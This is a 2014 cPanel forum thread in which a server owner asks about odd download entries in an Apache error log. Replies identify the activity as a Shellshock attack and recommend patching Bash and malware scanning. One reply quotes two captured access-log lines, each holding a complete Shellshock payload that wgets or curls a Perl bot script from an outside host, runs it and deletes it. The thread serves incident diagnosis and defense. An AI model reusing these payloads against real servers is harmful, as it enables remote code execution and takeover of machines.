Looks like someone trying to upload files to the server

tank · Nov 11, 2014

I noticed this is my apache error log.

Code:

[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904

I looked for this file that was uploaded but could not find it.

How do I disable this and or what is this?

24x7server · Nov 12, 2014

Hello,

I will suggest you please install mod_sec on your server with maldetect scanning, so that maldetect will be scan file while uploading on your server.

https://www.rfxn.com/projects/linux-malware-detect/

malk315 · Nov 13, 2014

This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

Log:
Code:
165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O
 /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:
Code:
81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm
p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
The telltale sign that a request is trying to exploit shellshock vulnerability in your BASH shell is the beginning function definition:
Code:
() { :; }
If you have an old version of BASH, update -- might need to build from source unless your box is really new.

There are lots of good sites out there that explain how to deal w/ shellshock.
I found this one quite helpful:

https://shellshocker.net/

Good luck.

tank · Nov 14, 2014

thanks guys for your answers. I will take a look.

Forums

The Community Forums

Interact with an entire community of cPanel & WHM users!

Looks like someone trying to upload files to the server

tank Well-Known Member

24x7server Well-Known Member

malk315 Registered

tank Well-Known Member

How to BCC someone on all outgoing emails from server?

can I stop someone from displaying my website on his domain?

11.54: Disable email notifications when someone logs into cPanel

Someone testing for CGI?

Share This Page

Useful Searches

The Community Forums

Interact with an entire community of cPanel & WHM users!

Looks like someone trying to upload files to the server

tank Well-Known Member

24x7server Well-Known Member

malk315 Registered

tank Well-Known Member

How to BCC someone on all outgoing emails from server?

can I stop someone from displaying my website on his domain?

11.54: Disable email notifications when someone logs into cPanel

Someone testing for CGI?

Share This Page